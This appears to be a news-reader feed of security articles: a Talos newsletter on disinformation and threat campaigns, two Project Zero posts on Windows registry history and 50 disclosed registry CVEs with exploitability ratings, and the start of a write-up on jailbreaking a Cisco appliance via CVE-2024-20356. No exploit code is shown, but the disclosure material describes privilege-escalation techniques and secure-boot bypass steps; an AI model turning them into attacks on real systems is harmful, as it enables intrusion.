Reading view

There are new articles available, click to refresh the page.

Could the Brazilian Supreme Court finally hold people accountable for sharing disinformation?

Could the Brazilian Supreme Court finally hold people accountable for sharing disinformation?

If you’re a regular reader of this newsletter, you already know about how strongly I feel about the dangers of spreading fake news, disinformation and misinformation. 

And honestly, if you’re reading this newsletter, I probably shouldn’t have to tell you about that either. But one of the things that always frustrates me about this seemingly never-ending battle against disinformation on the internet, is that there aren’t any real consequences for the worst offenders. 

At most, someone who intentionally or repeatedly shares information on their social platform that’s misleading or downright false may have their account blocked, suspended or deleted, or just that one individual post might be removed.  

Twitter, which has become one of the worst offenders for spreading disinformation, has gotten even worse about this over the past few years and at this point doesn’t do anything to these accounts, and in fact, even promotes them in many ways and gives them a larger platform. 

Meta, for its part, is now hiding more political posts on its platforms in some countries, but at most, an account that shares fake news is only going to be restricted if enough people report it to Meta’s team and they choose to take action.  

Now, I’m hoping that Brazil’s Supreme Court may start imposing some real-world consequences on individuals and companies that support, endorse or sit idly by while disinformation spreads. Specifically, I’m talking about a newly launched investigation by the court into Twitter/X and its owner, Elon Musk.  

Brazil’s Supreme Court says users on the platform are part of a massive misinformation campaign against the court’s justices, sharing intentionally false or harmful information about them. Musk is also facing a related investigation into alleged obstruction.  

The court had previously asked Twitter to block certain far-right accounts that were spreading fake news on Twitter, seemingly one of the only true permanent bans on a social media platform targeting the worst misinformation offenders. Recently, Twitter has declined to block those accounts. 

This isn’t some new initiative, though. Brazil’s government has long looked for concrete ways to implement real-world punishments for spreading disinformation. In 2022, the Supreme Court signed an agreement with the equivalent of Brazil’s national election commission “to combat fake news involving the judiciary and to disseminate information about the 2022 general elections.” 

Brazil’s president (much like the U.S.) has been battling fake news and disinformation for years now, making any political conversation there incredibly divisive, and in many ways, physically dangerous. I’m certainly not an authority enough on the subject to comment on that and the ways in which the term “fake news” has been weaponized to literally challenge what is “fact” in our modern society.  

And I could certainly see a world in which a high court uses the term “fake news” to charge and prosecute people who are, in fact, spreading *correct* and verifiable information.  

But, even just forcing Musk or anyone at Twitter to answer questions about their blocking policies could bring an additional layer of transparency to this process. Suppose we want to really get people to stop sharing misleading information on social media. In that case, it needs to eventually come with real consequences, not just a simple block when they can launch a new account two seconds later using a different email address. 

The one big thing 

Talos recently discovered a new threat actor we're calling “Starry Addax” targeting mostly human rights activists associated with the Sahrawi Arab Democratic Republic (SADR) cause. Starry Addax primarily uses a new mobile malware that it infects users with via phishing attack, tricking their targets into installing malicious Android applications we’re calling “FlexStarling.” The malicious mobile application (APK), “FlexStarling,” analyzed by Talos recently masquerades as a variant of the Sahara Press Service (SPSRASD) App. 

Why do I care? 

The targets in this campaign's case are considered high-risk individuals, advocating for human rights in the Western Sahara. While that is a highly focused particular demographic, FlexStarling is still a highly capable implant that could be dangerous if used in other campaigns. Once infected, Starry Addax can use their malware to steal important login credentials, execute remote code or infect the device with other malware.  

So now what? 

This campaign's infection chain begins with a spear-phishing email sent to targets, consisting of individuals of interest to the attackers, especially human rights activists in Morocco and the Western Sahara region. If you are a user who feels you could be targeted by these emails, please pay close attention to any URLs or attachments used in emails with these themes and ensure you’re only visiting trusted sites. The timelines connected to various artifacts used in the attacks indicate that this campaign is just starting and may be in its nascent stages with more infrastructure and Starry Addax working on additional malware variants. 

Top security headlines of the week 

A threat actor with ties to Russia is suspected of infecting the network belonging to a rural water facility in Texas earlier this year. The hack in the small town of Muleshoe, Texas in January caused a water tower to overflow. The suspect attack coincided with network intrusions against networks belonging to two other nearby towns. While the attack did not disrupt drinking water in the town, it would mark an escalation in Russian APTs’ efforts to spy on and disrupt American critical infrastructure. Security researchers this week linked a Telegram channel that took credit for the activity with a group connected to Russia’s GRU military intelligence agency. The adversaries broke into a remote login system used in ICS, which allowed the actors to interact with the water tank. It overflowed for about 30 to 45 minutes before officials took the machine offline and switched to manual operations. According to reporting from CNN, a nearby town called Lockney detected “suspicious activity” on the town’s SCADA system. And in Hale Center, adversaries also tried to breach the town network’s firewall, which prompted them to disable remote access to its SCADA system. (CNN, Wired

Meanwhile, Russia’s Sandworm APT is also accused of being the primary threat actor carrying out Russia’s goals in Ukraine. New research indicates that the group is responsible for nearly all disruptive and destructive cyberattacks in Ukraine since Russia's invasion in February 2022. One attack involved Sandworm, aka APT44, disrupting a Ukrainian power facility during Russia’s winter offensive and a series of drone strikes targeting Ukraine’s energy grid. Recently, the group’s attacks have increasingly focused on espionage activity to gather information for Russia’s military to use to its advantage on the battlefield. The U.S. indicated several individuals for their roles with Sandworm in 2020, but the group has been active for more than 10 years. Researchers also unmasked a Telegram channel the group appears to be using, called “CyberArmyofRussia_Reborn.” They typically use the channel to post evidence from their sabotage activities. (Dark Reading, Recorded Future

Security experts and government officials are bracing for an uptick in offensive cyber attacks between Israel and Iran after Iran launched a barrage of drones and missiles at Israel. Both countries have dealt with increased tensions recently, eventually leading to the attack Saturday night. Israel’s leaders have already been considering various responses to the attack, among which could be cyber attacks targeting Iran in addition to any new kinetic warfare. Israel and Iran have long had a tense relationship that included covert operations and destructive cyberattacks. Experts say both countries have the ability to launch wiper malware, ransomware and cyber attacks against each other, some of which could interrupt critical infrastructure or military operations. The increased tensions have also opened the door to many threat actors taking claims for various cyber attacks or intrusions that didn’t happen. (Axios, Foreign Policy

Can’t get enough Talos? 

Upcoming events where you can find Talos 

 Botconf (April 23 - 26) 

Nice, Côte d'Azur, France

This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants.

CARO Workshop 2024 (May 1 - 3) 

Arlington, Virginia

Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

RSA (May 6 - 9) 

San Francisco, California    

Most prevalent malware files from Talos telemetry over the past week 

This section will be on a brief hiatus while we work through some technical difficulties. 

The Windows Registry Adventure #2: A brief history of the feature

Posted by Mateusz Jurczyk, Google Project Zero

Before diving into the low-level security aspects of the registry, it is important to understand its role in the operating system and a bit of history behind it. In essence, the registry is a hierarchical database made of named "keys" and "values", used by Windows and applications to store a variety of settings and configuration data. It is represented by a tree structure, in which keys may have one or more sub-keys, and every subkey is associated with exactly one parent key. Furthermore, every key may also contain one or more values, which have a type (integer, string, binary blob etc.) and are used to store actual data in the registry. Every key can be uniquely identified by its name and the names of all of its ascendants separated by the special backslash character ('\'), and starting with the name of one of the top-level keys (HKEY_LOCAL_MACHINE, HKEY_USERS, etc.). For example, a full registry path may look like this: HKEY_CURRENT_USER\Software\Microsoft\Windows. At a high level, this closely resembles the structure of a file system, where the top-level key is equivalent to the root of a mounted disk partition (e.g. C:\), keys are equivalent to directories, and values are equivalent to files. One important distinction, however, is that keys are the only type of securable objects in the registry, and values play a much lesser role in the database than files do in the file system. Furthermore, specific subtrees of the registry are stored on disk in binary files called registry hives, and the hive mount points don't necessarily correspond one-to-one to the top-level keys (e.g. the C:\Windows\system32\config\SOFTWARE hive is mounted under HKEY_LOCAL_MACHINE\Software, a one-level nested key).

Fundamentally, there are only a few basic operations that can be performed in the registry. These operations are summarized in the table below:

Hives

Load hive

Unload hive

Flush hive to disk

Keys

Open key

Create key

Delete key

Rename key

Set/query key security

Set/query key flags

Enumerate subkeys

Notify on key change

Query key path

Query number of open subkeys

Close key handle

Values

Set value

Delete value

Enumerate values

Query value data

Before we dive into any of them in particular, let's first trace the registry's evolution and the path that led to its current state.

Windows 3.1

The registry was first introduced in Windows 3.1 released in 1992. It was designed as a centralized configuration store meant to address the many shortcomings of basic text configuration files from MS-DOS (e.g. config.sys) and the slightly more structured .INI files from very early versions of Windows. But the first registry was nothing like we know it today: there was only one top-level key (an equivalent of HKEY_CLASSES_ROOT) and only one hive (C:\windows\reg.dat) limited to 64 KB in size, formatted in a custom binary format represented by the magic bytes "SHCC3.10". There were no values (data was assigned directly to keys), and the registry was used solely for OLE/COM and file type registration. This is what the first Regedit.exe looked like when launched in advanced mode:

Screenshot of the first registry editor running on Windows 3.1

The first Registry Editor running on Windows 3.1

Despite its limitations, the Windows 3.1 registry was an important milestone, as it established long-lasting concepts like its hierarchical structure and paved the way for today's advanced registry features.

Windows NT 3.1, 3.5 and 3.51

One year later in 1993, a new version of Windows was released based on a completely refreshed and more robust kernel design: Windows NT 3.1. To this day, the original NT kernel continues to be the underpinning of all modern versions of Windows up to and including Windows 11 – and the same can be said for its registry implementation. The biggest functional registry changes found in Windows NT 3.x as compared to Windows 3.1 were:

  • Introducing many new top-level keys (HKLM, HKCU, HKU) and thus extending the scope of information intended to be stored in the registry.
  • Replacing the single reg.dat hive file with a number of separate hives (default, sam, security, software, system located in C:\winnt\system32\config).
  • Introducing named values with several possible data types.
  • Making registry keys securable.
  • Eliminating the 64 KB registry hive limit.

To accommodate these new features, Windows adopted a novel binary format called "regf", which was specifically designed to support the expanded functionality. The core principles behind the format remained unchanged across the NT 3.x version line, but it continued to internally evolve, as signified by the increasing version numbers encoded in the hive file headers. Specifically, pre-release builds of Windows NT 3.1 used regf v1.0, Windows NT 3.1 RTM used regf v1.1, and Windows NT 3.5 and 3.51 used regf v1.2.

Lastly, while Regedit.exe remained the simplistic "Registration Info Editor", a new utility, RegEdt32.exe, was added with far more options and unrestricted access to the system registry. Despite its dated appearance, the structure of the UI began to resemble the shape of the modern registry and the core concepts behind today's registry editor:

Screenshot of RegEdt32.exe running on Windows NT 3.1

RegEdt32.exe running on Windows NT 3.1

Notably, Windows NT 3.1 was the first system whose parts of code are still used today in Windows 11. Based on this observation, we can now confidently claim that the registry code base is over 30 years old.

Windows 95

Not long after, in the summer of 1995, Windows 95 was officially released to the public. It quickly became a huge hit, mostly thanks to innovations in the user interface – it was the first version to feature a taskbar, the Start menu, and the general look and feel that we now associate with Windows. With regards to the registry internals, though, it wasn't particularly interesting. It continued the trend started by Windows NT 3.x of expanding the registry into an even more central part of the operating system, and borrowed many of the same high-level concepts. However, since it was based on a completely different kernel than NT, the underlying registry implementation differed, too. All of the registry data was typically stored in just two files: C:\WINDOWS\System.dat and C:\WINDOWS\User.dat. They were encoded in yet another binary format indicated by the "CREG" signature, which was more capable than the Win3.1 format, but inferior to WinNT's regf (e.g. it didn't support security descriptors). The same format was later inherited by subsequent systems from the 9x series, namely Windows 98 and Me, but its legacy ended there. According to my knowledge, the CREG format had minimal impact on the registry's development in the NT line, so a deeper discussion of its internals isn't necessary.

Arguably, the one thing that had the most lasting impact in Windows 95 related to registry was the complete redesign of Regedit.exe, both functionally and visually. It gained the ability to browse the entire registry tree, read existing values and create new ones, rename keys, and search for text strings within keys, values and data. At first glance, it looks almost identical to the modern Registry Editor, with the exception of a few missing options, such as loading custom hives or managing key security. Even the program icon has remained largely unchanged and to many power users, it is synonymous with the Windows registry up to this day:

Screenshot of Redesigned Regedit.exe running on Windows 95

Redesigned Regedit.exe running on Windows 95

Windows NT 4.0

The debut of Windows NT 4.0 in 1996 marked another important milestone for the registry, but this time mostly on the technical side. In terms of visuals, NT 4.0 adopted the same graphical interface as Windows 95, including the new and improved Regedit.exe. As a result of the Regedit addition, Windows NT 4.0 now included two competing registry editors: Regedit from Windows 95 and RegEdt32 from Windows NT 3.x. They shared some overlapping functionality (e.g. the ability to manually traverse the registry and inspect individual values), but each offered some unique features too: only Regedit was capable of searching for data in values, while only RegEdt32 supported managing the security of registry keys. I suspect that the presence of two different tools must have been confusing for users who wanted to modify the system's internal settings: not only did they have to understand the structure of the registry and how to navigate it, but also know which tool to use for a specific task. Both utilities made their way into Windows 2000, but they were finally merged in Windows XP into a single Regedit.exe program. RegEdt32.exe can still be found on modern versions of Windows in C:\Windows\system32 as a historical artifact, but all it currently does is just launch Regedit.exe and terminate.

As mentioned earlier, the really important changes in NT 4.0 happened under the hood. Between the release of NT 3.51 and NT 4.0, the kernel developers updated some internal aspects of the regf format to simplify it and make it more efficient. Furthermore, a new optimization called "fast leaves" was introduced, which added special four-byte hints to the subkey lists in order to speed up key lookups. These changes were substantial and not backwards-compatible, so the version had to be increased again, leading to regf v1.3. This is noteworthy because 1.3 is the earliest hive type that is considered a modern version and that is still supported by today's Windows 10 and 11, even though newer format versions up to 1.6 exist now too. It means that one can copy a hive file off of a Windows NT 4.0 system, load it in Regedit on Windows 11, examine and modify it, copy it back, and each of these steps will work without issue. What is more, the support is not just there for reading archival hives – in documented API functions such as RegSaveKeyExA, version 1.3 is represented by the REG_STANDARD_FORMAT enum, indicating that it is considered the "standard" even as of today. And indeed, there are some core system hives in Windows 11, such as UsrClass.dat mounted at HKEY_USERS\<SID>_Classes, that are still encoded in the regf v1.3 format. So in that sense, Windows NT 4.0 and 11, despite being released decades apart and representing vastly different technological eras, exhibit a fundamental connection.

Modern times

Based on the fact that both the regf hive format and the graphical interface of Regedit have essentially remained the same between 1996 and 2024, one could assume that the internal registry implementation hasn't changed that much, either. We can try to prove or disprove this hypothesis by performing a little experiment, measuring the volume of registry-related code in each consecutive version of Windows. To ensure a consistent methodology and make the survey security-relevant, we will focus on the kernel-mode part of the Configuration Manager, which largely constitutes a local attack surface. Such an analysis is technically feasible and even relatively easy to achieve, because:

  • The entirety of the kernel registry-related code is compiled into a single executable image: ntoskrnl.exe.
  • Debug symbols (PDB/DBG files) for the kernels of all NT-family systems were made publicly available by Microsoft, either via the Microsoft Symbol Server, symbol packages downloadable from the Microsoft website, or symbol files bundled with the system installation media.
  • The kernel code follows a consistent naming convention, where all function names related to the registry start with either "Hv" (standing for Hive), "Cm" (standing for Configuration Manager) or "Vr" (likely standing for Virtualized Registry), with a few minor exceptions.
  • There are some very good reverse-engineering tools available today, which can help us count the number of assembly instructions or even the number of decompiled C-like source code lines corresponding to the registry engine.

In my case, I used IDA Pro with Hex-Rays to decompile the entire kernel of each NT-line system, and then ran a post-processing script to extract the registry related functions. After counting the numbers of lines and plotting them on a diagram, here is what we get:

Image of a histogram showing lines of code for registry related functions per windows version, starting at around 10,000 lines of code in NT 4.0 and increasing tenfold to around 100,000 lines in Windows 11

As we can see, there has been an enormous, steady growth of the code base, starting at around 10,000 lines of code in NT 4.0 and increasing tenfold to around 100,000 lines in Windows 11. It is important to reiterate that this only covers the kernel portions of the registry and ignores code found in user-mode libraries such as advapi32.dll, KernelBase.dll or ntdll.dll. Furthermore, I expect that the decompiled code is more dense than the original source code because it doesn't include any comments or whitespace. Taking all this into account, the total extent of the registry code managed by Microsoft is probably much bigger than the numbers shown above.

Going back to the kernel registry code, its expansion in time has been substantial, both in absolute and relative terms. But if these developments are invisible to the average user, what does all of the new code do? The changes can be divided into three major categories:

  • Optimizations: changes making the registry more efficient, e.g. introducing a "hash leaf" subkey index type to make key lookups even faster in regf v1.5, or adding a native system call to rename keys in-place without involving an expensive copy+delete operation on an entire subtree.
  • Backwards compatibility: changes meant to make legacy applications run seamlessly on modern systems, e.g. registry virtualization.
  • New features: changes adding new functionality to the registry or adapting it to new use cases. These are either made available via a new API (thus mainly relevant to software developers), or not documented at all and only used by Windows internally. Examples include support for values larger than 1 MB, registry callbacks, support for transactions, application hives, and differencing hives.

Interestingly, the biggest changes weren't occurring with any regularity, but rather were concentrated in just four versions of Windows: NT 3.1–4.0, XP, Vista and 10 Anniversary Update (1607). This is illustrated in the timeline below:

Timeline showing versions of windows and when registry functionality was added to each version, spanning from Windows NT 3.1 in 1993 through to Windows 10/11 22H2 in 2022

This is of course not an exhaustive list: it includes the features that I have found to be the most interesting during the security audit, but it is missing modifications related to incremental logging, improvements to how hive files are managed and mapped in memory, and many other optimizations, stability improvements and refactorings implemented by Microsoft throughout the years. But it goes to show that the registry is a highly complex part of the Windows kernel, and one with a lot of potential for deep, interesting bugs just waiting to be discovered.

In the next post, I will share a number of useful sources of information I have discovered while researching the registry. Some of them may be more obvious than others, but all of them have significantly helped me understand certain aspects of the technology or given me the necessary context that I was missing. Until next time!

The Windows Registry Adventure #1: Introduction and research results

Posted by Mateusz Jurczyk, Google Project Zero

In the 20-month period between May 2022 and December 2023, I thoroughly audited the Windows Registry in search of local privilege escalation bugs. It all started unexpectedly: I was in the process of developing a coverage-based Windows kernel fuzzer based on the Bochs x86 emulator (one of my favorite tools for security research: see Bochspwn, Bochspwn Reloaded, and my earlier font fuzzing infrastructure), and needed some binary formats to test it on. My first pick were PE files: they are very popular in the Windows environment, which makes it easy to create an initial corpus of input samples, and a basic fuzzing harness is equally easy to develop with just a single GetFileVersionInfoSizeW API call. The test was successful: even though I had previously fuzzed PE files in 2019, the new element of code coverage guidance allowed me to discover a completely new bug: issue #2281.

For my next target, I chose the Windows registry. That's because arbitrary registry hives can be loaded from disk without any special privileges via the RegLoadAppKey API (since Windows Vista). The hives use a binary format and are fully parsed in the kernel, making them a noteworthy local attack surface. Furthermore, I was also somewhat familiar with basic harnessing of the registry, having fuzzed it in 2016 together with James Forshaw. Once again, the code coverage support proved useful, leading to the discovery of issue #2299. But when I started to perform a root cause analysis of the bug, I realized that:

  • The hive binary format is not very well suited for trivial bitflipping-style fuzzing, because it is structurally simple, and random mutations are much more likely to render (parts of) the hive unusable than to trigger any interesting memory safety violations.
  • On the other hand, the registry has many properties that make it an attractive attack surface for further research, especially for manual review. It is 30+ years old, written in C, running in kernel space but highly accessible from user-mode, and it implements much more complex logic than I had previously imagined.

And that's how the story starts. Instead of further refining the fuzzer, I made a detour to reverse engineer the registry implementation in the Windows kernel (internally known as the Configuration Manager) and learn more about its inner workings. The more I learned, the more hooked I became, and before long, I was all-in on a journey to audit as much of the registry code as possible. This series of blog posts is meant to document what I've learned about the registry, including its basic functionality, advanced features, security properties, typical bug classes, case studies of specific vulnerabilities, and exploitation techniques.

While this blog is one of the first places to announce this effort, I did already give a talk titled "Exploring the Windows Registry as a powerful LPE attack surface" at Microsoft BlueHat Redmond in October 2023 (see slides and video recording). The upcoming blog posts will go into much deeper detail than the presentation, but if you're particularly curious and can't wait to find out more, feel free to check these resources as a starter. 🙂

Research results

In the course of the research, I filed 39 bug reports in the Project Zero bug tracker, which have been fixed by Microsoft as 44 CVEs. There are a few reasons for the discrepancy between these numbers:

  • Some single reports included information about multiple problems, e.g. issue #2375 was addressed by four CVEs,
  • Some groups of reports were fixed with a single patch, e.g. issues #2392 and #2408 as CVE-2023-23420,
  • One bug report was closed as WontFix and not addressed in a security bulletin at all (issue #2508).

All of the reports were submitted under the Project Zero 90-day disclosure deadline policy, and Microsoft successfully met the deadline in all cases. The average time from report to fix was 81 days.

Furthermore, between November 2023 and January 2024, I reported 20 issues that had low or unclear security impact, but I believed the vendor should nevertheless be made aware of them. They were sent without a disclosure deadline and weren't put on the PZ tracker; I have since published them on our team's GitHub. Upon assessment, Microsoft decided to fix 6 of them in a security bulletin in March 2024, while the other 14 were closed as WontFix with the option of being addressed in a future version of Windows.

This sums up to a total of 50 CVEs, classified by Microsoft as:

  • 39 × Windows Kernel Elevation of Privilege Vulnerability
  • 9 × Windows Kernel Information Disclosure Vulnerability
  • 1 × Windows Kernel Memory Information Disclosure Vulnerability
  • 1 × Windows Kernel Denial of Service Vulnerability

A full summary of the security-serviced bugs is shown below:

GPZ #

CVE

Title

Reported

Fixed

2295

CVE-2022-34707

Windows Kernel use-after-free due to refcount overflow in registry hive security descriptors

2022-May-11

2022-Aug-09

2297

CVE-2022-34708

Windows Kernel invalid read/write due to unchecked Blink cell index in root security descriptor

2022-May-17

2299

CVE-2022-35768

Windows Kernel multiple memory problems when handling incorrectly formatted security descriptors in registry hives

2022-May-20

2318

CVE-2022-37956

Windows Kernel integer overflows in registry subkey lists leading to memory corruption

2022-Jun-22

2022-Sep-13

2330

CVE-2022-37988

Windows Kernel registry use-after-free due to bad handling of failed reallocations under memory pressure

2022-Jul-8

2022-Oct-11

2332

CVE-2022-38037

Windows Kernel memory corruption due to type confusion of subkey index leaves in registry hives

2022-Jul-11

2341

CVE-2022-37990

Windows Kernel multiple memory corruption issues when operating on very long registry paths

2022-Aug-3

CVE-2022-38039

CVE-2022-38038

2344

CVE-2022-37991

Windows Kernel out-of-bounds reads and other issues when operating on long registry key and value names

2022-Aug-5

2359

CVE-2022-44683

Windows Kernel use-after-free due to bad handling of predefined keys in NtNotifyChangeMultipleKeys

2022-Sep-22

2022-Dec-13

2366

CVE-2023-21675

Windows Kernel memory corruption due to insufficient handling of predefined keys in registry virtualization

2022-Oct-6

2023-Jan-10

2369

CVE-2023-21747

Windows Kernel use-after-free due to dangling registry link node under paged pool memory pressure

2022-Oct-13

2389

CVE-2023-21748

Windows Kernel registry virtualization incompatible with transactions, leading to inconsistent hive state and memory corruption

2022-Nov-30

2375

Windows Kernel multiple issues in the key replication feature of registry virtualization

2022-Oct-25

CVE-2023-21772

CVE-2023-21773

CVE-2023-21774

2378

CVE-2023-21749

Windows Kernel registry SID table poisoning leading to bad locking and other issues

2022-Oct-31

CVE-2023-21776

2379

CVE-2023-21750

Windows Kernel allows deletion of keys in virtualizable hives with KEY_READ and KEY_SET_VALUE access rights

2022-Nov-2

2392

CVE-2023-23420

Windows Kernel multiple issues with subkeys of transactionally renamed registry keys

2022-Dec-7

2023-Mar-14

2408

Windows Kernel insufficient validation of new registry key names in transacted NtRenameKey

2023-Jan-13

2394

CVE-2023-23421

Windows Kernel multiple issues in the prepare/commit phase of a transactional registry key rename

2022-Dec-14

CVE-2023-23422

CVE-2023-23423

2410

CVE-2023-28248

Windows Kernel CmpCleanupLightWeightPrepare registry security descriptor refcount leak leading to UAF

2023-Jan-19

2023-Apr-11

2418

CVE-2023-28271

Windows Kernel disclosure of kernel pointers and uninitialized memory through registry KTM transaction log files

2023-Jan-31

2419

CVE-2023-28272

Windows Kernel out-of-bounds reads when operating on invalid registry paths in CmpDoReDoCreateKey/CmpDoReOpenTransKey

2023-Feb-2

CVE-2023-28293

2433

CVE-2023-32019

Windows Kernel KTM registry transactions may have non-atomic outcomes

2023-Mar-7

2023-Jun-13

2445

CVE-2023-35356

Windows Kernel arbitrary read by accessing predefined keys through differencing hives

2023-Apr-19

2023-Jul-11

2452

Windows Kernel CmDeleteLayeredKey may delete predefined tombstone keys, leading to security descriptor UAF

2023-May-10

2446

CVE-2023-35357

Windows Kernel may reference unbacked layered keys through registry virtualization

2023-Apr-20

2447

CVE-2023-35358

Windows Kernel may reference rolled-back transacted keys through differencing hives

2023-Apr-27

2449

CVE-2023-35382

Windows Kernel renaming layered keys doesn't reference count security descriptors, leading to UAF

2023-May-2

2023-Aug-8

2454

CVE-2023-35386

Windows Kernel out-of-bounds reads due to an integer overflow in registry .LOG file parsing

2023-May-15

2456

CVE-2023-38154

Windows Kernel partial success of registry hive log recovery may lead to inconsistent state and memory corruption

2023-May-22

2457

CVE-2023-38139

Windows Kernel doesn't reset security cache during self-healing, leading to refcount overflow and UAF

2023-May-31

2023-Sep-12

2462

CVE-2023-38141

Windows Kernel passes user-mode pointers to registry callbacks, leading to race conditions and memory corruption

2023-Jun-26

2463

CVE-2023-38140

Windows Kernel paged pool memory disclosure in VrpPostEnumerateKey

2023-Jun-27

2464

CVE-2023-36803

Windows Kernel out-of-bounds reads and paged pool memory disclosure in VrpUpdateKeyInformation

2023-Jun-27

2466

CVE-2023-36576

Windows Kernel containerized registry escape through integer overflows in VrpBuildKeyPath and other weaknesses

2023-Jul-7

2023-Oct-10

2479

CVE-2023-36404

Windows Kernel time-of-check/time-of-use issue in verifying layered key security may lead to information disclosure from privileged registry keys

2023-Aug-10

2023-Nov-14

2480

CVE-2023-36403

Windows Kernel bad locking in registry virtualization leads to race conditions

2023-Aug-22

2492

CVE-2023-35633

Windows registry predefined keys may lead to confused deputy problems and local privilege escalation

2023-Oct-6

2023-Dec-12

2511

CVE-2024-26182

Windows Kernel subkey list use-after-free due to mishandling of partial success in CmpAddSubKeyEx

2023-Dec-13

2024-Mar-12

None (MSRC-84131)

CVE-2024-26174

Windows Kernel out-of-bounds read of key node security in CmpValidateHiveSecurityDescriptors when loading corrupted hives

2023-Nov-29

None (MSRC-84149)

CVE-2024-26176

Windows Kernel out-of-bounds read when validating symbolic links in CmpCheckValueList

2023-Nov-29

None (MSRC-84046)

CVE-2024-26173

Windows Kernel allows the creation of stable subkeys under volatile keys via registry transactions

2023-Nov-30

None (MSRC-84228)

CVE-2024-26177

Windows Kernel unsafe behavior in CmpUndoDeleteKeyForTrans when transactionally re-creating registry keys

2023-Dec-1

None (MSRC-84237)

CVE-2024-26178

Windows Kernel security descriptor linked list confusion in CmpLightWeightPrepareSetSecDescUoW

2023-Dec-1

None (MSRC-84263)

CVE-2024-26181

Windows Kernel registry quota exhaustion may lead to permanent corruption of the SAM database

2023-Dec-11

Exploitability

Software bugs are typically only interesting to either the offensive/defensive sides of the security community if they have practical security implications. Unfortunately, it is impossible to give a blanket statement regarding the exploitability of all registry-related vulnerabilities due to their sheer diversity on a number of levels:

  • Affected platforms: Windows 10, Windows 11, various Windows Server versions (32/64-bit)
  • Attack targets: the kernel itself, drivers implementing registry callbacks, privileged user-mode applications/services
  • Entry points: direct registry operations, hive loading, transaction log recovery
  • End results: memory corruption, broken security guarantees, broken API contracts, memory/pointer disclosure, out-of-bounds reads, invalid/controlled cell index accesses
  • Root cause of issues: C-specific, logic errors, bad reference counting, locking problems
  • Nature of memory corruption: temporal (use-after-free), spatial (buffer overflows)
  • Types of corrupted memory: kernel pools, hive data
  • Exploitation time: instant, up to several hours

As we can see, there are multiple factors at play that determine how the bugs came to be and what state they leave the system in after being triggered. However, to get a better understanding of the impact of the findings, I have performed a cursory analysis of the exploitability of each bug, trying to classify it as either "easy", "moderate" or "hard" to exploit according to my current knowledge and experience (this is of course highly subjective). The proportions of these exploitability ratings are shown in the chart below:

A histogram showing the difficulty of exploitability for the registry issues: 18 were considered easy to exploit, 10 considered moderate and 22 considered hard

The ratings were largely based on the following considerations:

  • Hive-based memory corruption is generally considered easy to exploit, while pool-based memory corruption is considered moderate/hard depending on the specifics of the bug.
  • Triggering OOM-type conditions in the hive space is easy, but completely exhausting the kernel pools is more difficult and intrusive.
  • Logic bugs are typically easier and more reliable to exploit than memory corruption.
  • The kernel itself is typically easier to attack than other user-mode processes (system services etc.).
  • Direct information disclosure (leaking kernel pointers / uninitialized memory via various channels) is usually straightforward to exploit.
  • However, random out-of-bounds reads, as well as read access to invalid/controlled cell indexes is generally hard to do anything useful with.

Overall, it seems that more than half of the findings can be feasibly exploited for information disclosure or local privilege escalation (rated easy or moderate). What is more, many of them exhibit registry-specific bug classes which can enable particularly unique exploitation primitives. For example, hive-based memory corruption can be effectively transformed into both a KASLR bypass and a fully reliable arbitrary read/write capability, making it possible to use a single bug to compromise the kernel with a data-only attack. To demonstrate this, I have successfully developed exploits for CVE-2022-34707 and CVE-2023-23420. The outcome of running one of them to elevate privileges to SYSTEM on Windows 11 is shown on the screenshot below:

Screenshot of windows terminal showing successful exploitation for CVE-2022-34707 and CVE-2023-23420

Upcoming posts in this series will introduce you to the Windows registry as a system mechanism and as an attack surface, and will dive deeper into practical exploitation using hive memory corruption, out-of-bounds cell indexes and other amusing techniques. Stay tuned!

CVE-2024-20356: Jailbreaking a Cisco appliance to run DOOM

The Cisco C195 is a Cisco Email Security Appliance device. Its role is to act as an SMTP gateway on your network perimeter. This device (and the full range of appliance devices) is heavily locked down and prevents unauthorised code from running.

CISCO (ESA-C195-K9) ESA C195 Email

Source: https://www.melbourneglobal.com.au/cisco-esa-c195-k9-esa-c195-email/

I recently took one of these apart in order to repurpose it as a general server. After reading online about the device, a number of people mentioned that it is impossible to bypass secure boot in order to run other operating systems, as this is prevented by design for security reasons.

In this adventure, the Cisco C195 device family was jailbroken in order to run unintended code. This includes the discovery of a vulnerability in the CIMC body management controller which affects a range of different devices, whereby an authenticated high privilege user can obtain underlying root access to the server’s BMC (CVE-2024-20356) which in itself has high-level access to various other components in the system. The end goal was to run DOOM – if a smart fridge can do it, why not Cisco?

We have released a full toolkit for detecting and exploiting this vulnerability, which can be found on GitHub below:

github GitHub: https://github.com/nettitude/CVE-2024-20356

Usage of the toolkit is demonstrated later in this article.

BIOS Hacking

Under the hood, the Cisco C195 device is a C220 M5 server. This device is used throughout a large number of different appliances. The initial product is adapted to suit the needs of the target appliance. This in itself is a common technique and valid way of creating a large line of products from a known strong design. While this does have its advantages, it means any faults in the underlying design, supporting hardware or software are apparent on multiple device types.

The C195 is a 1U appliance that is designed to handle emails. It runs custom Cisco software provided by two disks in the device. I wanted to use the device for another purpose, but could not due to the restrictions in place preventing the device from booting unauthorised software. This is a good security feature for products, but does restrict how they can be used.

From first glance at the exterior, there was no obvious branding to indicate this was a Cisco UCS C220 M5. Upon taking off the lid, a few labels indicated the true identity of the server. Furthermore, a cover on the back of the device, when unscrewed, revealed a VGA port. A number of other ports were present on the back, such as Console (Cisco Serial) and RPC (CIMC). The RPC port was connected to a network, but the device did not respond.

Starting up the device displayed a Cisco branded AMI BIOS. The configuration itself was locked down and a number of configuration options were disabled. The device implemented a strong secure boot setup whereby only Cisco approved ESA/Cisco Appliance EFI files could be executed.

I could go into great detail here on what was tried, but to cut a long story short, I couldn’t see, modify or run much.

The BIOS was the first target in this attack chain. I was interested to see how different BIOS versions affect the operation of the device. New features often come with new attack surfaces, which pose potential new vectors to explore.

The device was running an outdated BIOS version. Some tools provided to update the BIOS were not allowed to run due to the locked down secure boot configuration. A number of different BIOS versions were tried and tested by removing the flash chip, upgrading the BIOS and placing the chip back on the board. To make this process easier, I created a DIY socket on the motherboard and a small mount for the chip to easily reflash the device on the fly. This was especially important when continuously reading/observing what kind of data is written back to the flash, and how it is stored.

